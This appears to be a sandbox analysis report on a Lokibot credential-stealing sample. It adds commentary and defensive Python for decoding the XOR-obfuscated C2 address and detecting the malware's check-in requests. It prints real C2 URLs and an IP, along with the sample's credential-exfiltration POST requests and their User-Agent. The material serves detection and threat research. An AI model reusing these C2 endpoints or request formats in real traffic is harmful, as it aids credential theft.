Source: http://kbfvzoboss.bid/alien/fre.php |
URL Reputation: Label: malware |
Source: http://alphastand.top/alien/fre.php |
URL Reputation: Label: malware |
Source: http://alphastand.win/alien/fre.php |
URL Reputation: Label: malware |
Source: http://alphastand.trade/alien/fre.php |
URL Reputation: Label: malware |
Source: 1.2.XZoxEqlRUw.exe.400000.0.unpack |
Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "\u0097\u008b\u008b\u008f\u00c5\u00d0\u00d0\u00cc\u00ce\u00d1\u00cd\u00cd\u00cf\u00d1\u00ce\u00d1\u00ce\u00c6\u00cb\u00d0\u0081\u0085\u009e\u009b\u0092\u0096\u0091\u00d0\u008f\u008b\u008d\u00ca\u00d0\u0092\u0090\u0091\u0090\u00d1\u008f\u0097\u008f"]} |
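The fifth entry in the extractor's C2 list is not a printable URL: XOR-ing every one of its bytes with 0xFF turns it into http://31.220.1.194/~zadmin/ptr5/mono.php, which is exactly the host and path the sample POSTs to in the HTTP traffic and Snort alerts further down, and an IP literal, which is why the report also logs TCP connections with no preceding DNS query. The four plaintext alphastand/kbfvzoboss URLs never appear in the traffic. The Python below is an added example, not output of the sandbox or of any configuration extractor; it runs that decoding over a copy of the extractor JSON constructed from the line above, and the function names are the example's own.

```python
import json
from urllib.parse import urlparse

# Constructed copy of the report's "Malware Configuration Extractor" output
# (C2 list only). The fifth entry is reproduced exactly as the extractor printed
# it: raw config bytes rendered as \u00xx escapes.
EXTRACTOR_JSON = r'''{"C2 list": [
  "http://kbfvzoboss.bid/alien/fre.php",
  "http://alphastand.trade/alien/fre.php",
  "http://alphastand.win/alien/fre.php",
  "http://alphastand.top/alien/fre.php",
  "\u0097\u008b\u008b\u008f\u00c5\u00d0\u00d0\u00cc\u00ce\u00d1\u00cd\u00cd\u00cf\u00d1\u00ce\u00d1\u00ce\u00c6\u00cb\u00d0\u0081\u0085\u009e\u009b\u0092\u0096\u0091\u00d0\u008f\u008b\u008d\u00ca\u00d0\u0092\u0090\u0091\u0090\u00d1\u008f\u0097\u008f"
]}'''


def xor_ff(entry: str) -> str:
    """Undo the single-byte XOR (key 0xFF) applied to the obfuscated C2 entry.

    The extractor emitted each config byte as the Unicode code point of the
    same value (U+0080..U+00FF), so encoding as latin-1 recovers the original
    byte values before the XOR is reversed.
    """
    raw = entry.encode("latin-1")
    return bytes(b ^ 0xFF for b in raw).decode("ascii", errors="replace")


def is_plain_url(entry: str) -> bool:
    """True for entries the extractor already shows as cleartext URLs."""
    return entry.isascii() and entry.startswith(("http://", "https://"))


def decode_c2_list(extractor_json: str) -> list:
    """Return every C2 entry as a cleartext URL, decoding obfuscated ones."""
    cfg = json.loads(extractor_json)
    return [e if is_plain_url(e) else xor_ff(e) for e in cfg["C2 list"]]


def c2_hosts(urls) -> list:
    """Hostnames/IP literals to compare against the network indicators."""
    return [urlparse(u).hostname for u in urls]


if __name__ == "__main__":
    for url in decode_c2_list(EXTRACTOR_JSON):
        print(url)
```

Only the decoded fifth URL should be treated as the live C2 when building blocklists; the four cleartext domains are worth recording but did not receive any traffic in this run.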
Source: XZoxEqlRUw.exe |
ReversingLabs: Detection: 95% |
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe |
Unpacked PE file: 1.2.XZoxEqlRUw.exe.400000.0.unpack |
Source: XZoxEqlRUw.exe |
Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe |
Code function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW, |
Source: Traffic |
Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49730 -> 31.220.1.194:80 |
Source: Traffic |
Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49730 -> 31.220.1.194:80 |
Source: Traffic |
Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49730 -> 31.220.1.194:80 |
Source: Traffic |
Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49730 -> 31.220.1.194:80 |
Source: Traffic |
Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49731 -> 31.220.1.194:80 |
Source: Traffic |
Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49731 -> 31.220.1.194:80 |
Source: Traffic |
Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49731 -> 31.220.1.194:80 |
Source: Traffic |
Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49731 -> 31.220.1.194:80 |
Source: Traffic |
Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49732 -> 31.220.1.194:80 |
Source: Traffic |
Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49732 -> 31.220.1.194:80 |
Source: Traffic |
Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49732 -> 31.220.1.194:80 |
Source: Traffic |
Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49732 -> 31.220.1.194:80 |
Source: Traffic |
Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49733 -> 31.220.1.194:80 |
Source: Traffic |
Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49733 -> 31.220.1.194:80 |
Source: Traffic |
Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49733 -> 31.220.1.194:80 |
Source: Traffic |
Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49733 -> 31.220.1.194:80 |
Source: Malware configuration extractor |
URLs: http://kbfvzoboss.bid/alien/fre.php |
Source: Malware configuration extractor |
URLs: http://alphastand.trade/alien/fre.php |
Source: Malware configuration extractor |
URLs: http://alphastand.win/alien/fre.php |
Source: Malware configuration extractor |
URLs: http://alphastand.top/alien/fre.php |
Source: Joe Sandbox View |
ASN Name: AMARUTU-TECHNOLOGYNL |
Source: global traffic |
HTTP traffic detected: POST /~zadmin/ptr5/mono.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 31.220.1.194
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: E0B63912
Content-Length: 176
Connection: close |
Source: global traffic |
HTTP traffic detected: POST /~zadmin/ptr5/mono.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 31.220.1.194
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: E0B63912
Content-Length: 176
Connection: close |
Source: global traffic |
HTTP traffic detected: POST /~zadmin/ptr5/mono.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 31.220.1.194
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: E0B63912
Content-Length: 149
Connection: close |
Source: global traffic |
HTTP traffic detected: POST /~zadmin/ptr5/mono.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 31.220.1.194
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: E0B63912
Content-Length: 149
Connection: close |
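The four POSTs above carry the traits the ET "LokiBot User-Agent (Charon/Inferno)" and "LokiBot Checkin" alerts key on: the fixed User-Agent string, an HTTP/1.0 POST of application/octet-stream with Content-Encoding: binary, a Content-Key header, and an IP-literal Host. The Python below is an added example, not a Snort rule from the report and not Lokibot code; it reassembles one request from the headers shown (the report gives only the body length, so the body is omitted), parses it, and scores those indicators, with a constructed benign upload for contrast. Function names and the requirement of two independent indicators are the example's own choices.

```python
import ipaddress
import re

# Constructed request: the headers the report shows on one line, restored
# with CRLF separators. Body omitted (the report only gives Content-Length).
LOKIBOT_POST = (
    b"POST /~zadmin/ptr5/mono.php HTTP/1.0\r\n"
    b"User-Agent: Mozilla/4.08 (Charon; Inferno)\r\n"
    b"Host: 31.220.1.194\r\n"
    b"Accept: */*\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"Content-Encoding: binary\r\n"
    b"Content-Key: E0B63912\r\n"
    b"Content-Length: 176\r\n"
    b"Connection: close\r\n"
    b"\r\n"
)

# Constructed benign request with an octet-stream POST but none of the
# Lokibot-specific traits.
BENIGN_POST = (
    b"POST /api/upload HTTP/1.1\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
    b"Host: updates.example.com\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"Content-Length: 176\r\n"
    b"\r\n"
)

LOKIBOT_UA = "Mozilla/4.08 (Charon; Inferno)"
CONTENT_KEY_RE = re.compile(r"^[0-9A-F]{8}$")


def parse_request(raw: bytes):
    """Split an HTTP request head into (method, path, version, headers)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    method, path, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, version, headers


def lokibot_indicators(raw: bytes) -> list:
    """Return the list of Lokibot check-in traits present in the request."""
    method, _path, version, h = parse_request(raw)
    hits = []
    if h.get("user-agent") == LOKIBOT_UA:
        hits.append("user-agent Charon/Inferno")
    if CONTENT_KEY_RE.match(h.get("content-key", "")):
        hits.append("Content-Key header")
    if (method == "POST" and version == "HTTP/1.0"
            and h.get("content-type") == "application/octet-stream"
            and h.get("content-encoding") == "binary"):
        hits.append("HTTP/1.0 POST octet-stream/binary")
    try:
        ipaddress.ip_address(h.get("host", ""))
        hits.append("Host is an IP literal")
    except ValueError:
        pass
    return hits


def is_lokibot_checkin(raw: bytes) -> bool:
    """Alert on the UA plus at least one corroborating trait.

    The UA alone is the high-confidence signal; requiring a second indicator
    keeps a spoofed or recycled UA on an unrelated request from firing.
    """
    hits = lokibot_indicators(raw)
    return "user-agent Charon/Inferno" in hits and len(hits) >= 2


if __name__ == "__main__":
    for name, req in (("lokibot", LOKIBOT_POST), ("benign", BENIGN_POST)):
        print(name, is_lokibot_checkin(req), lokibot_indicators(req))
```

Run over a proxy or Zeek http.log export, the same header checks give a host-independent detection: the C2 IP and path change between builds, the User-Agent and Content-Key convention do not.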
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 (50 occurrences) |
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe |
Code function: 1_2_00404ED4 recv, |
Source: unknown |
HTTP traffic detected: POST /~zadmin/ptr5/mono.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 31.220.1.194
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: E0B63912
Content-Length: 176
Connection: close |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Thu, 28 Mar 2024 19:56:52 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://www.yaworld.net/wp-json/>; rel="https://api.w.org/"
Connection: close
Content-Type: text/html; charset=UTF-8
Data Ascii (decoded from the hex dump, truncated in the source):
<!DOCTYPE html>
<html lang="ko-KR" prefix="og: https://ogp.me/ns#">
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
	<link rel="profile" href="http://gmpg.org/xfn/11">
	<!-- Meta social networks -->
		<!-- Google Analytics -->
	
<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-5F1HBKQ0XE"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-5F1HBKQ0XE');
</script>
	<!-- Meta Verification -->
	<meta name="google-site-verification" content="Gr7QG6k4WBHg3_FdErdBSqvByz_LWD7lT9GvHtfy9Iw" />	
<style> (truncated) |